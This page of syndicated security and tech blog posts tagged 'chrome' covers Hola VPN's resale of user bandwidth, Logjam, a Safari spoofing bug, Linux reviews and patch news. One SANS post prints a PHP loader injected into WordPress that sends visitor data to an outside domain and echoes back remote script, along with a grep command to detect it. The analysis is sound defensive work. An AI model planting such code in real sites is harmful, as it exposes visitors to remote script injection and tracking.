Posts tagged ‘chrome’

TorrentFreak: Hola VPN Sells Users’ Bandwidth, Founder Confirms

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Faced with increasing local website censorship and Internet services that restrict access depending on where a user is based, more and more people are turning to specialist services designed to overcome such limitations.

With prices plummeting to just a few dollars a month in recent years, VPNs are now within the budgets of most people. However, there are always those who prefer to get such services for free, without giving much consideration to how that might be economically viable.

One of the most popular free VPN/geo-unblocking solutions on the planet is operated by Israel-based Hola. It can be added to most popular browsers in seconds and has an impressive seven million users on Chrome alone. Overall the company boasts 46 million users of its service.

Now, however, the company is facing accusations from 8chan message board operator Fredrick Brennan. He claims that Hola users’ computers were used to attack his website without their knowledge, and that this was made possible by the way Hola is set up.

“When a user installs Hola, he becomes a VPN endpoint, and other users of the Hola network may exit through his internet connection and take on his IP. This is what makes it free: Hola does not pay for the bandwidth that its VPN uses at all, and there is no user opt out for this,” Brennan says.

This means that rather than having their IP addresses cloaked behind a private server, free Hola users are regularly exposing their IP addresses to the world but associated with other people’s traffic – no matter what that might contain.


While this will come as a surprise to many, Hola says it has never tried to hide the methods it employs to offer a free service.

Speaking with TorrentFreak, Hola founder Ofer Vilenski says that his company offers two tiers of service – the free option (which sees traffic routed between Hola users) and a premium service, which operates like a traditional VPN.

However, Brennan says that Hola goes a step further, by selling Hola users’ bandwidth to another company.

“Hola has gotten greedy. They recently (late 2014) realized that they basically have a 9 million IP strong botnet on their hands, and they began selling access to this botnet (right now, for HTTP requests only) at https://luminati.io,” the 8chan owner says.

TorrentFreak asked Vilenski about Brennan’s claims. Again, there was no denial.

“We have always made it clear that Hola is built for the user and with the user in mind. We’ve explained the technical aspects of it in our FAQ and have always advertised in our FAQ the ability to pay for non-commercial use,” Vilenski says.

And this is how it works.

Hola generates revenue by selling a premium service to customers through its Luminati brand. The resources and bandwidth for the Luminati product are provided by Hola users’ computers when they are sitting idle. In basic terms, Hola users get their service for free as long as they’re prepared to let Hola hand their resources to Luminati for resale. Any users who don’t want this to happen can buy Hola for $5 per month.

Fair enough perhaps – but how does Luminati feature in Brennan’s problems? It appears his interest in the service was piqued after 8chan was hit by multiple denial of service attacks this week which originated from the Luminati / Hola network.

“An attacker used the Luminati network to send thousands of legitimate-looking POST requests to 8chan’s post.php in 30 seconds, representing a 100x spike over peak traffic and crashing PHP-FPM,” Brennan says.

Again, TorrentFreak asked Vilenski for his input. Again, there was no denial.

“8chan was hit with an attack from a hacker with the handle of BUI. This person then wrote about how he used the Luminati commercial VPN network to hack 8chan. He could have used any commercial VPN network, but chose to do so with ours,” Vilenski explains.

“If 8chan was harmed, then a reasonable course of action would be to obtain a court order for information and we can release the contact information of this user so that they can further pursue the damages with him.”

Vilenski says that Hola screens users of its “commercial network” (Luminati) prior to them being allowed to use it but in this case “BUI” slipped through the net. “Adjustments” have been made, Hola’s founder says.

“We have communicated directly with the founder of 8Chan to make sure that once we terminated BUI’s account they’ve had no further problems, and it seems that this is the case,” Vilenski says.

It is likely the majority of Hola’s users have no idea how the company’s business model operates, even though it is made fairly clear in its extensive FAQ/ToS. Installing a browser extension takes seconds and if it works as advertised, most people will be happy.

Whether this episode will affect Hola’s business moving forward is open to question, but for those with a few dollars to spend there are plenty of options on the market. In the meantime, those looking for free options should read the small print before clicking install.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments for readability):

#2b8008#
error_reporting(0);                             /* turn off error reporting */
@ini_set('display_errors', 0);                  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];

/* only run the code if this is Chrome or IE and not a bot */
if (( preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610) ))
{
# Assemble a URL like http://errorcontent.com/content/?ip=[client ip]&referer=[server host name]&ua=[user agent]

$wp_mezd098610 = "http://"."error"."content".".com"."/content"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

# check if we have the curl extension installed
if (function_exists('curl_init') && function_exists('curl_exec')) { /* fetch $wp_mezd098610 with curl; this branch was truncated in the sample */ }

# if we don't have curl, try file_get_contents, which requires allow_url_fopen
elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) { $wp_8610mezd = @file_get_contents($wp_mezd098610); }

# or try fopen as a last resort
elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $wp_8610mezd = @stream_get_contents(@fopen($wp_mezd098610, 'r')); }
}

# The data retrieved will be echoed back to the user if it starts with the string "scr".
if (substr($wp_8610mezd, 1, 3) === 'scr') { echo $wp_8610mezd; }

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is anyone able to retrieve content from errorcontent.com?
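If you run WordPress and want to check whether your own install carries something similar, a quick recursive search for the marker string or the variable names is a reasonable first pass (the path is an example; note that grepping for the domain itself won't help, since it is assembled from string fragments):

grep -rn --include='*.php' -e '2b8008' -e 'wp_mezd' /var/www/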

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.
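A quick way to check whether a particular server still offers export-grade DHE is to ask for one of the old export ciphers directly (a sketch, assuming an OpenSSL build that still includes them; substitute the host you actually want to test):

openssl s_client -connect www.example.com:443 -cipher "EXP-EDH-RSA-DES-CBC-SHA" < /dev/null

If the handshake completes instead of failing, the server is willing to negotiate 512-bit export Diffie-Hellman.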

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve — the most efficient algorithm for breaking a Diffie-Hellman connection — is dependent only on this prime. After this first step, an attacker can quickly break individual connections.

The researchers believe the NSA has been using this attack:

We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”

[…]

The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget”:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation — just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

SANS Internet Storm Center, InfoCON: green: Address spoofing vulnerability in Safari Web Browser, (Mon, May 18th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A new vulnerability has surfaced in the Safari Web Browser that can lead to address spoofing, allowing attackers to show any URL in the address bar while loading a different web page. While this proof of concept is not perfect, it could easily be refined for use in phishing attacks.

There is a proof of concept at http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari Web Browser:

From the same iPad using Google Chrome:

The code is very simple: the webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can fetch the real page, so the user keeps seeing the spoofed URL in the address bar while a different page is displayed.

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
Twitter: @manuelsantander
Web: http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: Elementary OS Freya: Is This The Next Big Linux Distro?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Figure 1: The Freya default desktop.

I’ve tried just about every flavor of Linux available. Not a desktop interface has gone by that hasn’t, in some way, touched down before me. So when I set out to start kicking the tires of Elementary OS Freya, I assumed it was going to be just another take on the same old desktop metaphors. A variation of GNOME, a tweak of Xfce, a dash of OSX or some form of Windows, and the slightest hint of Chrome OS. What I wound up seeing didn’t disappoint on that level—it was a mixed bag of those very things. However, that mixed bag turned out to be something kind of special … something every Linux user should take notice of.

Why? Because Elementary OS Freya gets a lot of things right, including some things that other distributions have failed to bring to light. True user-friendliness.

Elementary OS Freya takes all of the known elements of a good UI, blends them together, and doesn’t toss in anything extraneous that might throw the user for a loop. The end result is a desktop interface that anyone (and I do mean anyone) can use without hiccup.

Before I dive any further into this, I must say that Freya is still in beta (and has been for quite some time). That being said, the beta release of Freya is rock solid. You can download the beta here and install it alongside your current OS or as a virtual guest in VirtualBox.

With that said, let’s examine what it is about Elementary OS Freya that makes it, quite possibly, the most ideal Linux desktop distribution (and maybe what it could use to draw it nearer to perfection).

Design

This is where Freya truly nails just about every possible aspect of the desktop interface. Upon installation (or loading up the live image), you are greeted with a minimalist interface that, at first glance, looks like a take on GNOME Shell with an added dock for good measure (Figure 1).

You only need scratch the surface to find out that Freya has taken hints from nearly every major interface and rolled them into a coherent whole that will please everyone. Consider this:

  • OSX dock

  • Chrome OS menu

  • GNOME Shell panel

  • Multiple workspaces

  • OSX consistency in design

  • Ubuntu system settings

  • Ubuntu Software Center.

Do you see where this is going? With those pieces working as a cohesive unit, the Freya desktop is already light years ahead of a number of platforms. And they do work together very well.

The foundation

Elementary OS did right by choosing Ubuntu as its foundation. With this, they receive the Ubuntu Software Center, which happens to be one of the most user-friendly package managers within the Linux ecosystem. This also adds the Ubuntu System Settings tool, which is quite simple to use (Figure 2).

Figure 2: The Elementary OS Freya System Settings tool.

Where Elementary OS Freya departs from Ubuntu (besides Unity) is in the default applications. This also happens to be one area where Freya does stumble a bit. By this, I mean the default web browser. I get the desire to use Midori over the likes of Chrome or Firefox, but the reality is that choice limits the platform in a number of ways (think supported sites). For someone like me, who depends upon Google Drive, Midori simply does not work. When I try to access Google Drive, I receive the warning "You are using an unsupported browser."

To get around this, I must install either Chrome or Firefox. Not a problem, of course. All I need to do is hop on over to the Software Center and install Firefox. If I want Chrome, I head over to the Chrome download location and download the installable .deb file. If you install either Chrome or Firefox, surprisingly enough, the design scheme holds true for both.

NOTE: If you want to install Chrome on the current Freya beta, I highly recommend against doing so. Every attempt to load the Chrome download page (through either Midori or Firefox) actually crashes the Freya desktop to the point where a hard restart is necessary. So install Firefox through the Software Center and then download Chrome with Firefox. I did, however, manage to download the .deb file for Chrome on one machine, transfer it (via USB), and then install Chrome on Elementary OS. Once this was done, the Chrome Download page loaded fine (from Chrome only) and Google Drive worked flawlessly.
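If you go the transfer-a-.deb route, the install itself is just a couple of commands (a sketch; the filename is whatever Google's download page gives you, and the second command pulls in any missing dependencies):

sudo dpkg -i google-chrome-stable_current_amd64.deb
sudo apt-get -f install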

Missing apps

Outside of a supported browser, the one area where Elementary OS needs a bit of attention is the application selection. Upon installation, you will find no sign of an office suite or graphics tool. In fact, the closest thing to a word processor is the Scratch text editor. There is no LibreOffice to be found (and with the state of Midori rendering Google Drive useless, this is an issue).

Yes, you can hop over to the Software Center and install LibreOffice, but we’re looking at a Linux desktop variant that offers one of the most well designed interfaces for new users. Why make those users jump through hoops to have what nearly every flavor of Linux installs by default? On top of that, when installing LibreOffice through the Software Center (on Elementary OS), you wind up with a very out of date iteration of the software (4.2.8.2) ─ which completely shatters the aesthetics of the platform (Figure 3).

Figure 3: An out-of-date version of LibreOffice breaks the global theme.

Including LibreOffice (and an up-to-date version at that) would take next to no effort. The latest iteration of Ubuntu (15.04) includes LibreOffice 4.4. This release of the flagship open source office suite would be much better suited for Elementary OS Freya … on every level. I highly recommend downloading the main LibreOffice installer and installing with the following steps:

  1. Open a terminal window.

  2. Change into the Downloads folder (assuming you downloaded the file there) with the command cd Downloads.

  3. Unpack the file with the command tar xvzf LibreOffice_XXX.tar.gz (Where XXX is the release number).

  4. Change into the DEBS subfolder of the newly created directory.

  5. Issue the command sudo dpkg -i *.deb.

Once the installation is complete, you’ll need to run the new install from the command line (since the entries for LibreOffice in the Applications menu will still be the old 4.2 release). The command to run the new version of LibreOffice is libreoffice4.4. Once opened, you can lock the launcher to the dock by right-clicking the LibreOffice icon in the dock and selecting Keep in Dock.
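Collected into a single shell session, the steps above look roughly like this (the archive name is illustrative; use whatever file you actually downloaded):

cd ~/Downloads
tar xvzf LibreOffice_4.4.3_Linux_x86-64_deb.tar.gz
cd LibreOffice_4.4.3*/DEBS
sudo dpkg -i *.deb
libreoffice4.4 &    # run the new version once so you can pin it to the dock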

There is so much to love about Elementary OS Freya. Considering this platform is still in beta makes it all the more impressive. Even though there are areas that could use a bit of polish, what we are looking at could easily take over as the single most user-friendly and well designed Linux distribution to date.

Have you given Elementary OS Freya a try? If so, what was your impression? Will you be ready to hop from your current distribution to this new flavor, once it is out of beta? If not, what keeps you from jumping ship?  

Krebs on Security: Adobe, Microsoft Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Microsoft today issued 13 patch bundles to fix roughly four dozen security vulnerabilities in Windows and associated software. Separately, Adobe pushed updates to fix a slew of critical flaws in its Flash Player and Adobe Air software, as well as patches to fix holes in Adobe Reader and Acrobat.

Three of the Microsoft patches earned the company’s most dire “critical” rating, meaning they fix flaws that can be exploited to break into vulnerable systems with little or no interaction on the part of the user. The critical patches plug at least 30 separate flaws. The majority of those are included in a cumulative update for Internet Explorer. Other critical fixes address problems with the Windows OS, .NET, Microsoft Office, and Silverlight, among other components.

According to security vendor Shavlik, the issues addressed in MS15-044 deserve special priority in patching, in part because the bulletin impacts so many different Microsoft programs, but also because the vulnerabilities fixed in the patch can be exploited merely by viewing specially crafted content in a Web page or a document. More information on and links to today’s individual updates can be found here.

Adobe’s update for Flash Player and AIR fixes at least 18 security holes in the programs. Updates are available for the Windows, OS X and Linux versions of the software. For Mac and Windows users, the latest, patched version is v. 17.0.0.188.

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as with Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update, click the triple bar icon to the right of the address bar, select "About Google Chrome", click the apply update button and restart the browser.


The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

If you run Adobe Reader, Acrobat or AIR, you’ll need to update those programs as well. Adobe said it is not aware of any active exploits or attacks against any of the vulnerabilities it patched with today’s releases.

Schneier on Security: Protecting Against Google Phishing in Chrome

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Google has a new Chrome extension called “Password Alert”:

To help keep your account safe, today we’re launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you’ve installed it, Password Alert will show you a warning if you type your Google password into a site that isn’t a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here’s how it works for consumer accounts. Once you’ve installed and initialized Password Alert, Chrome will remember a “scrambled” version of your Google Account password. It only remembers this information for security purposes and doesn’t share it with anyone. If you type your password into a site that isn’t a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you’re at risk of being phished so you can update your password and protect yourself.

It’s a clever idea. Of course it’s not perfect, and doesn’t completely solve the problem. But it’s an easy security improvement, and one that should be generalized to non-Google sites. (Although it’s not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.

Slashdot thread.

Toool's Blackbag: Euro-Locks

This post was syndicated from: Toool's Blackbag and was written by: Walter. Original post: at Toool's Blackbag

April 24th, a delegation of Toool visited the Euro-Locks factory in Bastogne, Belgium.

Sales manager Jean-Louis Vincart welcomed us and talked us through the history of Euro-Locks, the factories and products. After that, we visited the actual production facility. The Bastogne factory is huge and almost all of their products are completely built here. We spoke with the R&D people creating new molds, saw molten zamac, steel presses, chrome baths, assembly lines and packaging, so everything from the raw metal to the finished product. It’s interesting to see so many products (both in range and in the actual number of locks produced) being made here, with no stock of the finished product kept on hand.

Thanks to Eric and Martin for making the visit possible.

The Hacker Factor Blog: Great Googly Moogly!

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Google recently made another change to their pagerank algorithm. This time, they are ranking results based on the type of device querying it. What this means: a Google search from a desktop computer will return different results compared to the same search from a mobile device. If a web page is better formatted for a mobile device, then it will have a higher search result rank for searches made from mobile devices.

I understand Google’s desire to have web pages that look good on both desktop and mobile devices. However, shouldn’t the content, authoritativeness, and search topic be more important than whether the page looks pretty on a mobile device?

As a test, I searched Google for “is this picture fake”. The search results on my desktop computer were different from the results from my Android phone. In particular, the 2nd desktop result was completely gone on the mobile device, the FotoForensics FAQ was pushed down on the mobile device, TinEye was moved up on the mobile device, and other analysis services were completely removed from the mobile results.

In my non-algorithmic personal opinion, I think the desktop results returned more authoritative results and better matched the search query than the mobile device results.

Google’s Preference

Google announced this change on February 26, giving developers less than two months' notice.

While two months may be plenty of time for small developers to change their site layout, I suspect that most small developers never heard about this change. For larger organizations, two months is barely enough time to have a meeting about having a meeting about scheduling a meeting to discuss a site redesign for mobile devices.

In other words: Google barely gave anyone notice, and did not give most sites time to act. This is reminiscent of those security researchers who report vulnerabilities to vendors and then set arbitrarily short deadlines before going public. Short deadlines are not about doing the right thing; they're about pushing an agenda.

Tools for the trade

On the plus side, Google provided a nice web tool for evaluating web sites. This allows site designers to see how their web pages look on a mobile device. (At least, how it will look according to Google.)

Google also provides a mobile guide that describes what Google thinks a good web page layout looks like. For example, you should use large fonts and only one column in the layout. Google also gives suggestions like using dynamic layout web pages (detect the screen and rearrange accordingly) and using separate servers (www.domain and m.domain): one for desktop users and one for mobile devices.

Google’s documentation emphasizes that this is really for smartphone users. They state that by “mobile devices”, they are only talking about smartphones and not tablets, feature phones, and other devices. (I always thought that a mobile device was anything you could use while being mobile…)

Little Time, Little Effort

One of my big irks about Google is that Google’s employees seem to forget that not every company is as big as Google or has as many resources as Google. Not everyone is Google. By giving developers very little time to make changes that better match Google’s preferred design, it just emphasizes how out of touch Google’s developers are with the rest of the world. The requirements decreed in their development guidelines also show an unrealistic view of the world. For example:

  • Google recommends using dynamic web pages for more flexibility. It also means much more testing and requires a larger testing environment. Testing is usually where someone notices that the site lacks usability.

    Google+ has a flexible interface — the number of columns varies based on the width of the browser window. But Google+ also has a horrible multi-column layout that cannot be disabled. And LinkedIn moved most of their billions of options into popups — now you cannot click on anything without it being covered by a popup window first.

    For my own sites, I do try to test with different browsers. Even if I think my site looks great on every mobile device I tested, that does not mean that it will look great on every mobile device. (I cannot test on everything.)

    Providing the same content to every device minimizes the development and testing efforts. It also simplifies the usability options.

  • Google suggests the option of maintaining two URLs or two separate site layouts — one for desktops and one for mobile devices. They overlook that this means twice the development effort, which translates into twice the development costs.
  • Maintaining two URLs also means double the amount of bot traffic indexing the site, double the load on the server, and double the network bandwidth. Right now, about 75% of the traffic to my site comes from bots indexing and mirroring (and attacking) my site. If I maintained two URLs to the same content with different formatting, I would be dividing the visitor load between the two sites (half go mobile and half go desktop), while doubling the bot traffic.
  • Google’s recommendations normalize the site layout. Everyone should use large text. Everyone should use one column for mobile displays, etc.

    Normalizing web site layouts goes against the purpose of HTML and basic web site design. Your web site should look the way that you want it to look. If you want small text, then you can use small text. If you want a wide layout, then you can use a wide layout. Every web site can look different. Just be aware that Google’s pagerank system now penalizes you for looking different and for expressing creativity.

  • Google’s online test for mobile devices does not take into account whether the device is held vertically or horizontally. My Android phone rotates the screen and makes the text larger when I hold it horizontally. According to Google, all mobile pages should be designed for a vertical screen.

Ironically, there has been a lot of effort by mobile web browser developers (not the web site, but the actual browser developers) to mitigate display issues in the browser. One tap zooms into the text and reflows it to fit the screen, another tap zooms out and reflows it again. And rotating the screen makes the browser display wider instead of taller. Google’s demand to normalize the layout really just means that Google has zero confidence in the mobile browser developers and a limited view on how users use mobile devices.

Moving targets

There’s one significant technical issue that is barely addressed by Google’s Mobile Developer Guide: how does a web site detect a mobile device?

According to Google, your code should look at the user-agent field for “Android” and “Mobile”. That may work well with newer Android smartphones, but it won’t help older devices or smartphones that don’t use those keywords. Also, there are plenty of non-smartphone devices that use these words. For example, Apple’s iPad tablet has a user-agent string that says “Mobile” in it.

In fact, there is no single HTTP header that says “Hi! I’m a mobile device! Give me mobile content!” There’s a standard header for specifying supported document formats. There’s a standard header for specifying preferred language. But there is no standard for identifying a mobile device.

There is a great write-up called “How to Detect Mobile Devices”. It lists a bunch of different methods and the trade-offs between each.

For example, you can try to use JavaScript to render the page. This is good for most smartphones, but many feature-phones lack JavaScript support. The question also becomes: what should you detect? Screen size may be a good option, but otherwise there is no standard. This approach can also be problematic for indexing bots since it requires rendering JavaScript to see the layout. (Running JavaScript in a bot becomes a halting problem since the bot cannot predict when the code will finish rendering the page.)

Alternately, you can try to use custom style sheets. There’s a style sheet extension “@media” for specifying a different layout for mobile devices. Unfortunately, many mobile devices don’t support this extension. (Oh the irony!)

Usually people try to detect the mobile device on the server side. Every web browser sends a user-agent string that describes the browser and basic capabilities. For example:

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.3) Gecko/20150308 Firefox/31.9 PaleMoon/25.3.0

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4

Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-T530NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36

Opera/9.80 (Android; Opera Mini/7.6.40234/36.1701; U; en) Presto/2.12.423 Version/12.16

The first sample user-agent string identifies the Pale Moon web browser (PaleMoon 25.3.0) on a 64-bit Windows 7 system (Windows NT 6.1; Win64). It says that it is compatible with Firefox 31 (Firefox/31.9) and supports the Gecko toolkit extension (Gecko/20150308). This is likely a desktop system.

The second sample identifies Mobile Safari 8.0 on an iPhone running iOS 8.1.2. This is a mobile device — because I know iPhones are mobile devices, and not because it says “Mobile”.

The third sample identifies the Android browser 1.5 on a Samsung SM-T530NU device running Android 4.4 (KitKat) and configured for English from the United States. It doesn’t say what it is, but I can look it up and determine that the SM-T530NU is a tablet.

The fourth and final example identifies Opera Mini, which is Opera for mobile devices. Other than looking up the browser type, nothing in the user-agent string tells me it is a mobile device.

The typical solution is to have the web site check the user-agent string for known parts. If it sees "Mobile" or "iPhone", then we can assume it is some kind of mobile device — but not necessarily a smartphone. The web site Detect Mobile Browsers offers code snippets for detecting mobile devices. Google’s documentation says to look for ‘Android’ and ‘Mobile’. Here’s the PHP code that Detect Mobile Browsers suggests using:

$useragent = $_SERVER['HTTP_USER_AGENT'];
if (preg_match('/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i',substr($useragent,0,4))) { /* then... */ }

This is more than just detecting ‘Android’ and ‘Mobile’. If the user-agent string says Android or Meego or Mobile or Avantgo or Blackberry or Blazer or KDDI or Opera (with mini or mobi or mobile)… then it is probably a mobile device.

